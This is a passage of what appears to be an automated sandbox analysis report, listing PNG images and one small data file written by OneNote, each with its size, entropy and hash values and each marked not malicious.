                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) \200, numeric, rows 262223750, columns 0
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                          Entropy (8bit):2.3713571991456197
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ulXwtLbMLzTtE/xtl:KaQLzu/xX
                                                                                                                                                                                                          MD5:2F06125407AD183EBE228947488221E4
                                                                                                                                                                                                          SHA1:FED7F9D3745CF72B8AB3577A58C0E3A6857E3939
                                                                                                                                                                                                          SHA-256:48BB48FB8C0E9DF433AE8F5248A576D8B3623B630D8583D83E62776EE15C9C35
                                                                                                                                                                                                          SHA-512:49C5E568294C40047423F12912DDCE46941C74DFACE8BCA18FCE64C63FDC1B9FDF2A85D519372B91093585375E15A47B1458B0FA3AA2C7FD4A0ADA55A9C79E15
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
